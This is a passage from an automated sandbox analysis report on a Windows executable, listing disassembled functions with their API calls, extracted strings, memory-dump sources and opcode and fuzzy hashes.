                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d158d7a886c1d506a390d3adf61ae93fef57ecd1f9be21e1d8e7ffcd8c237490
                                        • Instruction ID: 9af9cca993bea39a8792d91e5000129e07caba8a95efe3eebbde742049cfdcc7
                                        • Opcode Fuzzy Hash: d158d7a886c1d506a390d3adf61ae93fef57ecd1f9be21e1d8e7ffcd8c237490
                                        • Instruction Fuzzy Hash: 09F19A716283028FC718CF28C59466ABBE9EFCA354F244A2EF585D7391D630ED55CB82
                                        Function 002E6CDC Relevance: .3, Instructions: 343COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 1e1d1bde8d3e6c068c63fa97f2521babcd1bee16a58e50d3dc3fd0481c9166c7
                                        • Instruction ID: 6f031e0ec6be82408d632e7be852e31b16fb52713ac5d548fd96382b994629af
                                        • Opcode Fuzzy Hash: 1e1d1bde8d3e6c068c63fa97f2521babcd1bee16a58e50d3dc3fd0481c9166c7
                                        • Instruction Fuzzy Hash: D2D116716583818FCB14CF2AC88475BBBE1BF99308F48456DE8899B342D774E924CB56
                                        Function 002DE9B7 Relevance: .3, Instructions: 320COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ddb8d14b2144f489841213b984a32ff7bc8dfb9d5ad276b475631e951fde8fd4
                                        • Instruction ID: bda309f8bf25b24a8085030a67b831fbc37fcf5a1c5f7fe437e9f4c665768c2e
                                        • Opcode Fuzzy Hash: ddb8d14b2144f489841213b984a32ff7bc8dfb9d5ad276b475631e951fde8fd4
                                        • Instruction Fuzzy Hash: FAE148755083948FC305CF69D8914AABBF0AF8E310F46499EF9C497392C335EA19DB92
                                        Function 002E4088 Relevance: .3, Instructions: 270COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                        • Instruction ID: 90d39f89f3dd9722b64f128a0cf4b819e07c40bca48658ecd07e9208ffb17de3
                                        • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                        • Instruction Fuzzy Hash: 57917CB02603868BDB24FF75DC94BBE73C4EB90300F90092DFA9AC7281DA749965D752
                                        Function 002E43BF Relevance: .2, Instructions: 243COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                        • Instruction ID: b7ec774400706dff450312a52874231dd6af46c9f9da0be647b2833ceb4714d6
                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                        • Instruction Fuzzy Hash: A38183717643C64BDB24FE66C8C4B7D37C4EBA1304FC0092DE986CB2C1DA7489A58752
                                        Function 002F51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66d69c04f9f7462095bc97925f76e00beb6e73692fa48c5752c04151df49e226
                                        • Instruction ID: f7075307c18c2ab50532a2b92b534c3a5a90595ea6b870ec08508bf28b5c39ae
                                        • Opcode Fuzzy Hash: 66d69c04f9f7462095bc97925f76e00beb6e73692fa48c5752c04151df49e226
                                        • Instruction Fuzzy Hash: B4616731A30F3E56EA385D6C58A5BBEE394AB413C0F14077AEF42DB282D691DD728741
                                        Function 002F4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                        • Instruction ID: f2c40883fb5d661fe3222b771d3a2ce4294458b44d4ea5b35da1b96f9153aa0d
                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                        • Instruction Fuzzy Hash: 9F515620230E2E57DB345D288556BBFE7C99B053C0F180A3DEB8BD7682CA85ED758791
                                        Function 002DEFE2 Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1065bd207500e145f1d0899f184ae0abf24cd712fda2bd82c28fd03cbb51a387
                                        • Instruction ID: 5faa7adb835c02cb7ccca5c19b3c24624b1dee576a5c6b568cb15183750f090e
                                        • Opcode Fuzzy Hash: 1065bd207500e145f1d0899f184ae0abf24cd712fda2bd82c28fd03cbb51a387
                                        • Instruction Fuzzy Hash: 4951E3315093D58FC702CF39C65046EBFE0AE9A314F4949AEE4DA5B343C221DE5ACB66
                                        Function 002E00B7 Relevance: .1, Instructions: 141COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d5dc123dce90837f110b04ee0c43a8cabb3cafd52148ee8e99a9c344ac55854
                                        • Instruction ID: be1e5e1ddc408d2a7165dc2df00394c752b377812fd8eade5ed223a59cb4d088
                                        • Opcode Fuzzy Hash: 7d5dc123dce90837f110b04ee0c43a8cabb3cafd52148ee8e99a9c344ac55854
                                        • Instruction Fuzzy Hash: 8E51E0B1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E7340D734E959CB96
                                        Function 002E3E0B Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                        • Instruction ID: 7a19bc2680941c7ed9878d1835119465ab83a7abbd4dbbd5b91f0e090427fb80
                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                        • Instruction Fuzzy Hash: 683113B1A247468FCB14DF29C85526ABBE0FB95301F44492DE889C7742C738EE1ACF91
                                        Function 002DE2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 002DE30E
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                          • Part of subcall function 002E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00311030,00000200,002DD928,00000000,?,00000050,00311030), ref: 002E1DC4
                                        • _strlen.LIBCMT ref: 002DE32F
                                        • SetDlgItemTextW.USER32(?,0030E274,?), ref: 002DE38F
                                        • GetWindowRect.USER32(?,?), ref: 002DE3C9
                                        • GetClientRect.USER32(?,?), ref: 002DE3D5
                                        • GetWindowLongW.USER32(?,000000F0), ref: 002DE475
                                        • GetWindowRect.USER32(?,?), ref: 002DE4A2
                                        • SetWindowTextW.USER32(?,?), ref: 002DE4DB
                                        • GetSystemMetrics.USER32(00000008), ref: 002DE4E3
                                        • GetWindow.USER32(?,00000005), ref: 002DE4EE
                                        • GetWindowRect.USER32(00000000,?), ref: 002DE51B
                                        • GetWindow.USER32(00000000,00000002), ref: 002DE58D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$d$t0
                                        • API String ID: 2407758923-3906022979
                                        • Opcode ID: fe5e76b987007dad0e57cfd3bd5c9460d478f85c4e67359fd7b5ef7568bb7991
                                        • Instruction ID: 6ccf42058834a8539f159a29e06f9c9ff39555a78d324356be56f0a543ef559c
                                        • Opcode Fuzzy Hash: fe5e76b987007dad0e57cfd3bd5c9460d478f85c4e67359fd7b5ef7568bb7991
                                        • Instruction Fuzzy Hash: C981B071608301AFD711EF68CD89A6BBBECEF88704F05491EFA84D7290D634ED058B52
                                        Function 002FCB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 002FCB66
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC71E
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC730
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC742
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC754
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC766
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC778
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC78A
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC79C
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7AE
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7C0
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7D2
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7E4
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7F6
                                        • _free.LIBCMT ref: 002FCB5B
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002FCB7D
                                        • _free.LIBCMT ref: 002FCB92
                                        • _free.LIBCMT ref: 002FCB9D
                                        • _free.LIBCMT ref: 002FCBBF
                                        • _free.LIBCMT ref: 002FCBD2
                                        • _free.LIBCMT ref: 002FCBE0
                                        • _free.LIBCMT ref: 002FCBEB
                                        • _free.LIBCMT ref: 002FCC23
                                        • _free.LIBCMT ref: 002FCC2A
                                        • _free.LIBCMT ref: 002FCC47
                                        • _free.LIBCMT ref: 002FCC5F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID: h0
                                        • API String ID: 161543041-1489814411
                                        • Opcode ID: e70e5f55997bba2fa5c0cc4663e004dfdc058fbfb854fed137172edd733ae82a
                                        • Instruction ID: 977be7a03a726da845b11d80cdc16feb8a4cbc080e4ba92e7fbc0123577ef97a
                                        • Opcode Fuzzy Hash: e70e5f55997bba2fa5c0cc4663e004dfdc058fbfb854fed137172edd733ae82a
                                        • Instruction Fuzzy Hash: 61313D3162020E9FDB25AE38DA45B7AF7E9AF113D4F24443AE758D6191DE31A860CB10
                                        Function 002F96F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 002F9705
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002F9711
                                        • _free.LIBCMT ref: 002F971C
                                        • _free.LIBCMT ref: 002F9727
                                        • _free.LIBCMT ref: 002F9732
                                        • _free.LIBCMT ref: 002F973D
                                        • _free.LIBCMT ref: 002F9748
                                        • _free.LIBCMT ref: 002F9753
                                        • _free.LIBCMT ref: 002F975E
                                        • _free.LIBCMT ref: 002F976C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: 0d0
                                        • API String ID: 776569668-4234322573
                                        • Opcode ID: 200b4296ac40f045769986cf8c8057903a0118b3f14ccb624c74b90ad8d305b2
                                        • Instruction ID: bdbec393ed3ee304dac49ae6da684fe6dc6ec1921b6ccff7d9c324657a2ff0b5
                                        • Opcode Fuzzy Hash: 200b4296ac40f045769986cf8c8057903a0118b3f14ccb624c74b90ad8d305b2
                                        • Instruction Fuzzy Hash: C211A47612010DAFCB01EF64C842DE9BBB5EF153D0B5154A1FB088F262DE32DA609F84
                                        Function 002E9711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 002E9736
                                        • _wcslen.LIBCMT ref: 002E97D6
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 002E97E5
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002E9806
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002E982D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                        • String ID: Fjun.$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                        • API String ID: 1777411235-3726714326
                                        • Opcode ID: 702819b43036f65aaefbea7a6e9d983e563a5647b3250aa561b0edd7f27f21cd
                                        • Instruction ID: 68d2e5af2b3e9924f2cf9bd8e9578b3ea86b91867a51195a18b07e41b8079789
                                        • Opcode Fuzzy Hash: 702819b43036f65aaefbea7a6e9d983e563a5647b3250aa561b0edd7f27f21cd
                                        • Instruction Fuzzy Hash: 4931AE321683463BE725BF329C06FAFB79CDF42350F10011FF601921D1EB608A688BA5
                                        Function 002ED69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 002ED6C1
                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 002ED6ED
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 002ED709
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 002ED720
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 002ED734
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 002ED75D
                                        • DeleteObject.GDI32(00000000), ref: 002ED764
                                        • GetWindow.USER32(00000000,00000002), ref: 002ED76D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: STATIC
                                        • API String ID: 3820355801-1882779555
                                        • Opcode ID: 451fec43f3c768610b7b7e64f115df948ca90d3c966350ecc720467d10bc5e11
                                        • Instruction ID: 4090f891a75bc36bc234b84bc5859e97719097982085d79801954003e775ce9a
                                        • Opcode Fuzzy Hash: 451fec43f3c768610b7b7e64f115df948ca90d3c966350ecc720467d10bc5e11
                                        • Instruction Fuzzy Hash: 381136765D03917BE7227F729C8AFAFB65CAF00711F808121FA52A2091DA748B154AA2
                                        Function 002F2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
